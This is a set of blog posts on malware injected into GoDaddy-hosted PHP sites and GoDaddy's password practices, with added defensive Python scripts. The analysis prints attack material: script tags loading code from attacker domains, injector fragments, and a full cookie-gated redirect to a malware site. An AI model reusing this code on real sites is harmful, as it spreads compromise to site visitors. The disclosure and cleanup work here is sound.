Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain (http://losotrana.com/js.php). This is the script that will show up on your site if you get hacked:

<script src="http://losotrana.com/js.php"></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far are hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they have not been able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same IP address as holasionweb.com, the domain used on the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from 178.32.42.1, which also spoofs Googlebot's User-Agent string (the request claims to come from Google):

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
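A request that claims to be Googlebot but comes from an address with no Google reverse DNS, like the one above, is easy to flag automatically. The script below is an added example, not code from the original post: it parses log lines in the format shown and applies Google's documented crawler check (reverse-resolve the IP, require a name under googlebot.com or google.com, then forward-resolve that name and require the original IP). The resolver functions are injected so the example runs offline against a constructed lookup table; the 66.249.66.1 entry, its hostname and the 198.51.100.7 line are constructed sample data, and the socket-based resolvers at the end are what you would pass in for real logs.

```python
"""Flag requests whose User-Agent claims Googlebot but fail the DNS check."""
import re
import socket

# Constructed sample log; the first line copies the one shown in the post.
SAMPLE_LOG = """\
178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.1 - - - "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - - "GET /about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
"""

# ip, three "-" fields, quoted request, status, size, quoted referer, quoted UA
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \S+ "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_verified_googlebot(ip, reverse, forward):
    """Google's documented check: PTR name under a Google domain and the
    forward lookup of that name must contain the original IP."""
    name = reverse(ip)
    if not name or not name.lower().rstrip(".").endswith(GOOGLE_SUFFIXES):
        return False
    return ip in forward(name)


def find_spoofed_googlebot(log_text, reverse, forward):
    """Return (ip, request) for every Googlebot-claiming line that fails the check."""
    suspicious = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or "Googlebot" not in rec["ua"]:
            continue
        if not is_verified_googlebot(rec["ip"], reverse, forward):
            suspicious.append((rec["ip"], rec["request"]))
    return suspicious


# Constructed offline resolver tables standing in for real PTR/A lookups.
FAKE_PTR = {"66.249.66.1": "crawl-66-249-66-1.googlebot.com"}
FAKE_A = {"crawl-66-249-66-1.googlebot.com": {"66.249.66.1"}}


def fake_reverse(ip):
    return FAKE_PTR.get(ip)


def fake_forward(name):
    return FAKE_A.get(name, set())


def live_reverse(ip):
    """Real PTR lookup for use on actual logs."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def live_forward(name):
    """Real A lookup for use on actual logs."""
    try:
        return set(socket.gethostbyname_ex(name)[2])
    except OSError:
        return set()


if __name__ == "__main__":
    for ip, req in find_spoofed_googlebot(SAMPLE_LOG, fake_reverse, fake_forward):
        print(f"unverified Googlebot claim from {ip}: {req}")
```

Run against real access logs with `live_reverse` and `live_forward`; the lines this reports are the ones worth blocking or investigating, since a genuine Google crawler always passes the two-way check.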

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Reply from GoDaddy regarding the latest attacks

GoDaddy just sent us an update. I am glad they are now acknowledging that they have a problem and are looking to fix it. They didn’t give more details to avoid revealing too much and helping the attackers.

No more blaming the users! I am glad about this response, and hopefully they will find out what is going on and fix it.

“Early into our investigation, Go Daddy noticed a majority of exploited websites were all running WordPress. After feedback from customers, more attacks and more in-depth analysis, we modified our statement to specify the attacks targeted numerous PHP-based applications, which included WordPress.

Transparency is a core value at Go Daddy. We intend to continue our commitment to communications. There are times, however, when publicly revealing too much, such as specific code from the attack, helps the criminals causing the issue.

We are aggressively collecting data to see how the attack is maturing and to discover ways we can help prevent our customers from being impacted and shut down ‘the bad guys’ altogether. Go Daddy is leading an ongoing effort, working with industry security experts and other top hosting providers.

As part of our investigation, Go Daddy is encouraging customer input about their related website issues, which is why we set up a special form: http://www.GoDaddy.com/securityissue.

Look for further updates from Go Daddy on this topic, at http://Community.GoDaddy.com/support

- Todd Redfoot, Go Daddy Chief Information Security Officer”

Transparency is important, and hopefully when they find out what happened they will do a full case study so we can all learn from it (or am I dreaming too much?).

Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, Kevin Reville, got tired of getting hacked and set up a cron script to monitor his site and alert him when new files were added.

What did he find? He found the malware used by the attackers to infect everyone.

Just to be clear: this has nothing to do with WordPress. In fact, on one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this situation was called "simple_production.php" (but we heard reports of different names being used). It is a base64-encoded file that looks like this: (see it in full: MW:SIPRO:1)

eval(base64_decode("DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3…

Decoded, this is what it does: (see the full content here)

1. First, it removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2. Encodes the JavaScript:

$cod=base64_encode('<script src="http://holasionweb.com/oo.php">
$to_pack='if(function_exists(\'ob_start\')&&!isset($GLOBALS[\'mr_n..

3. Scans all directories and adds the malware to all PHP files. After that, it prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo "Working with $val\n";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";

So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.


Last week attacks – Some comments and updates

Last week was a busy one.

First, thousands of GoDaddy sites got hacked with that kdjkfjskdfjlskdjf.com malware.

A few days later, hundreds of Network Solutions sites got hacked by using the php.ini/cgi-bin malware (including the US Treasury site).

The next day, thousands more sites at different providers (GoDaddy, DreamHost, HostGator, etc.) got hacked with the MW:MROBH:1 malware.

So, what was going on?

Network Solutions attack

The problem at Network Solutions was caused by an internal application used on their hosting platform that allowed the exploit to happen. They fixed it already, so the problem should not reoccur. The number of infected sites was around 500.

GoDaddy

GoDaddy blamed the users (saying they were using old WordPress versions) and didn’t provide us with information regarding what happened. We know that WordPress wasn’t the problem (we saw sites using the latest version getting hacked), so no one knows what happened. Probably thousands of sites got hacked.

DreamHost

DreamHost contacted us and explained that on their platform the issue was caused by a "specific backdoor shell that we've seen used in conjunction with a variety of redirect and SEO related hacks." Around 500 sites got hacked. Their statement:

We’ve seen a dozen or so examples of this passed to us via support and have researched it ourselves. It seems to be related to a specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.

A scan across all our server files for known shells was done across customer HTTP servers and they were deleted. 550 account owners were contacted with notification of the finding of this backdoor shell file and the changing of their related FTP passwords. They were also provided directions for removing some of the common derivative hacks that have been associated with it, including a link to your web site and further directions to make use of SFTP exclusively due to FTP’s inherent security constraints. The great majority of these shells were added (as indicated by file date) in late November and December.

How are they getting in?

The Network Solutions issue was explained and fixed. At DreamHost, it was a PHP shell. But what about the others? How were the attackers able to inject content on all these sites?

Skyphire (and others), in our comments, mentioned that the infected files had a phpMyAdmin cookie added, which would indicate a bug (maybe a 0-day) in phpMyAdmin. That would be a possible cause, since all those shared hosts are using phpMyAdmin. This is the cookie added:

getCookie("pma_visited_theme1");

We can’t prove it, but we will keep an eye out to find out exactly what is going on. Have more info? Let us know.

Second round of GoDaddy sites hacked

It seems that a second round of attacks is happening today at GoDaddy, infecting all kinds of sites (Joomla, WordPress, etc.). Looking at the modification dates on the files, they all happened May 1st (today) during the morning, from 1 to 3/4 am.

All of them had the following javascript added to their pages:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is what this kp.php file looks like:

// Cookie helpers: the cookie is what makes each visitor get redirected only once,
// which keeps the redirect from being noticed by the site owner on a repeat visit.
function setCookie(c_name, value, expiredays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + expiredays);
    document.cookie = c_name + "=" + escape(value) +
        ((expiredays == null) ? "" : ";expires=" + exdate.toGMTString());
}

function getCookie(c_name) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) {
            c_start = c_start + c_name.length + 1;
            c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end));
        }
    }
    return "";
}

// First visit (no cookie yet): set the cookie for 20 days and send the whole
// window to the *.xorg.pl landing page. Later visits do nothing.
var name = getCookie("pma_visited_theme1");
if (name == "") {
    setCookie("pma_visited_theme1", "1", 20);
    var url = "http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D";
    window.top.location.replace(url);
} else { }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string at the top:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.
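The injector analysed in the "Found code" post walks a directory tree and prepends an eval(base64_decode(...)) line to every PHP file, and the cleanup advice here is to open the index files and theme files and remove that line. The following script is an added example, not the cleanup script linked from the posts: it does the reverse walk, reporting every .php file that contains the marker and stripping the prefix only when it has exactly the known shape at the top of the file, leaving anything else for manual review. The sample files and the short base64 payload in them are constructed for the demo and are not the real payload.

```python
"""Scan a web root for the eval(base64_decode(...)) prefix and strip it."""
import os
import re
import tempfile

# The injected prefix as described in the post: "<?php /**/ eval(base64_decode("...")); ?>"
# at the very start of the file. Only this exact shape is removed automatically.
INJECTION_RE = re.compile(
    r'^<\?php\s*/\*\*/\s*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\s*\?>\s*'
)
SUSPICIOUS_MARKER = "eval(base64_decode("


def strip_injection(text):
    """Return (cleaned_text, removed). Unknown forms of the marker are left alone."""
    m = INJECTION_RE.match(text)
    if not m:
        return text, False
    return text[m.end():], True


def scan_tree(root):
    """Sorted relative paths of .php files that contain the marker anywhere."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if SUSPICIOUS_MARKER in fh.read():
                    hits.append(os.path.relpath(path, root))
    return sorted(hits)


def clean_tree(root, dry_run=True):
    """Strip the known prefix from each hit. Returns (cleaned, needs_review):
    needs_review lists files where the marker is present but not in the known
    shape, so a person has to look (a legitimate use, or a different payload)."""
    cleaned, needs_review = [], []
    for rel in scan_tree(root):
        path = os.path.join(root, rel)
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        new_text, removed = strip_injection(text)
        if not removed:
            needs_review.append(rel)
            continue
        if not dry_run:
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(new_text)
        cleaned.append(rel)
    return cleaned, needs_review


# Constructed sample tree (the payload is a harmless placeholder, not the real one).
SAMPLE_INJECTION = '<?php /**/ eval(base64_decode("ZWNobyAnaGknOw==")); ?>\n'
SAMPLE_FILES = {
    "index.php": SAMPLE_INJECTION + "<?php echo 'home'; ?>\n",
    "wp-content/themes/x/header.php": SAMPLE_INJECTION + "<?php get_header(); ?>\n",
    "wp-content/themes/x/style.css": "body { color: #000; }\n",
    "clean.php": "<?php echo 'clean'; ?>\n",
    # marker present but not at the top in the known shape: must be reviewed by hand
    "odd.php": "<?php\n$x = 1;\neval(base64_decode(\"Zm9v\"));\n",
}


def build_sample_tree(root):
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the sample tree in a temp dir, scan, clean, rescan; return the results."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        before = scan_tree(root)
        cleaned, review = clean_tree(root, dry_run=False)
        after = scan_tree(root)
        return {"before": before, "cleaned": cleaned, "review": review, "after": after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it in dry-run mode first (the default) and only rewrite files after looking at the report; after cleaning, also compare the file modification times against the infection window, since the injector touches every PHP file it reaches, not only index files.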

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

GoDaddy Security update

My last post GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission got a lot of traction and it reached the ears of the GoDaddy people!

I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me.

First, I was glad that they heard the customers, heard the complaints and took the time to look at it. This was his explanation:

  1. They take security seriously and spend a lot of money on intrusion/malware detection to protect their customers
  2. They have a security team monitoring all their shared/VPS and private servers 24/7
  3. When they detect any issue, they try to fix the problem, and that’s why they tried to access my box
  4. They store all the passwords encrypted (not one-way hashed, which is the recommended approach), and they can only be retrieved and reversed after a member of the security team opens a ticket and explains the reason for using the password (like to investigate malware)

One thing that made me feel better was that they actually have a process in place to access the passwords and they hold their people accountable for that. Having them encrypted or in clear-text doesn’t make much of a difference if the process to recover them is open to anyone on their staff…
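The "one-way hashed" alternative mentioned above is worth seeing concretely, because it changes the threat model: with a salted password hash there is no retrieval procedure to gate with tickets, since the stored record cannot be reversed by anyone. The code below is an added example written for this post; it is not GoDaddy's code and says nothing about how their system works. It stores PBKDF2-HMAC-SHA256 records with a random per-password salt, verifies in constant time, and shows how a "previous password" check (the kind of history that showed up in the honeypot logs as clear-text) can be kept as old hashes rather than old passwords.

```python
"""Salted one-way password storage with verification and a history check."""
import base64
import hashlib
import hmac
import os

ALGO = "pbkdf2_sha256"
DEFAULT_ITERATIONS = 600_000   # work factor; raise as hardware allows


def hash_password(password, iterations=DEFAULT_ITERATIONS):
    """Return a self-describing record: algo$iterations$salt$digest.
    The salt is random per password, so identical passwords get different
    records, and nothing in the record allows recovering the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        ALGO,
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password, record):
    """Recompute the digest with the stored salt and iteration count and
    compare in constant time. This is the only operation the record supports."""
    try:
        algo, iterations, salt_b64, digest_b64 = record.split("$")
        iterations = int(iterations)
    except ValueError:
        return False
    if algo != ALGO:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(actual, expected)


def reused_from_history(password, history):
    """Password-history check without keeping old passwords: keep the old
    records and test the candidate against each of them."""
    return any(verify_password(password, rec) for rec in history)


if __name__ == "__main__":
    current = hash_password("correct horse battery staple")
    print("stored record:", current)
    print("login ok:", verify_password("correct horse battery staple", current))
    print("wrong password:", verify_password("Tr0ub4dor&3", current))
    previous = [hash_password("old-pass-1"), hash_password("old-pass-2")]
    print("reuse of old password:", reused_from_history("old-pass-2", previous))
```

A support process that needs a server password should issue a new, time-limited credential instead of reading the stored one; with records like these, that is the only option left, which is the point.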

He said that most users like their free incident response and malware removal and the way they deal with security issues.

He also said that they should have contacted me before accessing the box, warning me of the possible malware, and that they will do that from now on (good to know).

I am happy they called and explained the situation. +1 for GoDaddy for being open, explaining the issue and trying to improve.

GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission

*UPDATE: I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me. Check it out: GoDaddy Security update

I have been a GoDaddy user for a while and never had problems with them. In fact, unlike some people, I had great support and service from them.

However, one recent situation is making me change my mind about them…

I have my domains and a bunch of VPS (virtual private servers) with GoDaddy, and one of those servers is/was hosting Sucuri’s official site.

I am a bit paranoid about security, and on all my servers I switch the sshd port to a different one and restrict it to only a few IP addresses. On the official SSH port (tcp 22), I install a honeypot to detect SSH scans and which passwords/users they use (you can see some of my analysis in this post: Honeypot analysis – Looking at SSH scans).

Anyway, early this year I started posting information about web-based malware and a few days after I did that, I saw on my honeypot logs:

Jan 8 06:55:28 d1 sshd[27670]: Failed password for [mygodaddyuser] from 64.202.160.65 port 49271 ssh2
Jan 8 06:55:30 d1 sshd[27670]: Failed password for [mygodaddyuser] from 64.202.160.65 port 49271 ssh2
Jan 8 06:56:38 d1 sshd[28528]: User root from nat-64-202-160-65.ip.secureserver.net not allowed because listed in DenyUsers
Jan 8 06:56:38 d1 sshd[28528]: Failed none for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 06:56:53 d1 sshd[28528]: Failed password for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 06:56:55 d1 sshd[28528]: Failed password for invalid user root from 64.202.160.65 port 50727 ssh2

And checking my honeypot logs, I saw:

Jan 8 06:55:28 d1 sshd[27670]: hh: user: [mygodaddyuser]|pass: [MYGODADDYPASS]
Jan 8 06:55:30 d1 sshd[27670]: hh: user: [mygodaddyuser]|pass: [MYGODADDYPREVIOUSPASS]
Jan 8 06:56:53 d1 sshd[28528]: hh: user: root|pass: [MYGODADDYPASS]
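What made these entries stand out was not the volume (a few failed logins on port 22 are background noise) but that the attempts came from one source, used the box's real account name, and resolved to a recognisable network. The script below is an added example, not part of the original post: it parses sshd lines in the format above, groups failures per source address, joins the "not allowed because listed in DenyUsers" line (which carries the reverse DNS name) to the other lines from the same sshd process, and flags any source that tried a name from a list of real accounts. The 64.202.160.65 lines are the ones from the post, with its own [mygodaddyuser] placeholder; the 203.0.113.9 line is a constructed noise entry. Passwords captured by the honeypot are deliberately not parsed or reported.

```python
"""Per-source summary of failed SSH logins from sshd log lines."""
import re
from collections import defaultdict

# Constructed sample modelled on the post's log lines.
SAMPLE_AUTH_LOG = """\
Jan 8 06:55:28 d1 sshd[27670]: Failed password for [mygodaddyuser] from 64.202.160.65 port 49271 ssh2
Jan 8 06:55:30 d1 sshd[27670]: Failed password for [mygodaddyuser] from 64.202.160.65 port 49271 ssh2
Jan 8 06:56:38 d1 sshd[28528]: User root from nat-64-202-160-65.ip.secureserver.net not allowed because listed in DenyUsers
Jan 8 06:56:38 d1 sshd[28528]: Failed none for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 06:56:53 d1 sshd[28528]: Failed password for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 06:56:55 d1 sshd[28528]: Failed password for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 07:10:02 d1 sshd[29001]: Failed password for invalid user admin from 203.0.113.9 port 40001 ssh2
"""

# "Failed password for X from IP port N" and "Failed none for invalid user X from IP port N"
FAILED_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Failed (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
# The DenyUsers line is the one place sshd logs the reverse DNS name of the peer.
DENY_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: User (?P<user>\S+) from (?P<host>\S+) "
    r"not allowed because listed in DenyUsers"
)


def summarize_ssh_failures(log_text, known_accounts):
    """Return {ip: {"attempts", "users", "hosts", "known_account_tried"}}.

    known_accounts: names of real accounts on the box. A scanner guessing
    'root' or 'admin' is noise; an attempt using your actual username is not,
    so any source that tried one of these names is flagged."""
    known = set(known_accounts)
    pid_host = {}
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set(), "pids": set()})
    for line in log_text.splitlines():
        m = DENY_RE.search(line)
        if m:
            pid_host[m.group("pid")] = m.group("host")
            continue
        m = FAILED_RE.search(line)
        if m:
            entry = per_ip[m.group("ip")]
            entry["attempts"] += 1
            entry["users"].add(m.group("user"))
            entry["pids"].add(m.group("pid"))
    result = {}
    for ip, entry in per_ip.items():
        result[ip] = {
            "attempts": entry["attempts"],
            "users": sorted(entry["users"]),
            # reverse DNS names seen for this IP, joined via the sshd pid
            "hosts": sorted({pid_host[p] for p in entry["pids"] if p in pid_host}),
            "known_account_tried": bool(entry["users"] & known),
        }
    return result


if __name__ == "__main__":
    report = summarize_ssh_failures(SAMPLE_AUTH_LOG, {"[mygodaddyuser]"})
    for ip, info in report.items():
        flag = "  <-- real account name used" if info["known_account_tried"] else ""
        print(f"{ip}: {info['attempts']} failures, users={info['users']}, "
              f"hosts={info['hosts']}{flag}")
```

Feeding the flagged addresses to a whois lookup, as the post does next, is the natural follow-up; the summary makes it obvious which source deserves that lookup.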

I was shocked! My first thought was that someone had stolen my GoDaddy password (that I use to login to their web page) and even my previous password! (I had changed my password a few weeks before that).

I quickly ran and started a panic-mode incident response, changed passwords and started to look at how I got hacked and what was going on, when I decided to look at the IP address that tried to access my box:

$ whois 64.202.160.65
[Querying whois.arin.net]
[whois.arin.net]

OrgName: GoDaddy.com, Inc.
OrgID: GODAD
Address: 14455 N Hayden Road
Address: Suite 226
City: Scottsdale
StateProv: AZ
PostalCode: 85260
Country: US

NetRange: 64.202.160.0 - 64.202.191.255
CIDR: 64.202.160.0/19
NetName: GO-DADDY-SOFTWARE-INC
NetHandle: NET-64-202-160-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: CNS1.SECURESERVER.NET
NameServer: CNS2.SECURESERVER.NET
NameServer: CNS3.SECURESERVER.NET
Comment:
RegDate: 2002-10-22
Updated: 2007-06-14

Hmm... It came from GoDaddy’s own network. I was about to send an email to abuse@godaddy.com when I got this email:

It has come to our attention that the [your site name] may be infected by malware. We would like to investigate this matter further, however the login credentials we have on file for your server do not allow us access to the server. In order for us to proceed to investigate the possible infection, we require that you provide the proper login credentials to access your server with administrative rights within 48 hours or by January 10th @ 2 pm MST (GMT -0700) by using our “Password Sync” option, or your server will be suspended. To update the logon information, please follow these steps:

Log into your account.
Click on the ‘My Account’ link.
Click on the ‘Dedicated/Virtual Dedicated Servers’ link.
Select the server you need to update the log on information for.
Click on the ‘Open Manager’ link.
Click on the Support: Sync Passwords button.
Enter the current SSH and root information and save the information.

WTF!WTF!WTF! Yes, I cursed them for a while! Why?

  1. They tried to SSH to my “private” server without my authorization!
  2. They wanted my ROOT password and SSH access!
  3. They HAD MY MAIN GODADDY PASSWORD (AND PREVIOUS ONE) in CLEAR-TEXT!
  4. They almost gave me a heart attack

I don’t know if anyone else finds that horrifying, but I do! I would understand storing the initial password for the server in clear-text or something like that. But the main password for my GoDaddy account? Giving their admins access to it so they can SSH to my box? Keeping my old password in clear-text too? SSHing to my box without asking me first? Wow….

The end of the story… After I calmed down, I contacted them, explained my web-based malware security research and told them that I would not give anyone SSH access. If they really required that, I would switch providers. They did some investigation, apologized and let me stay… How nice they are…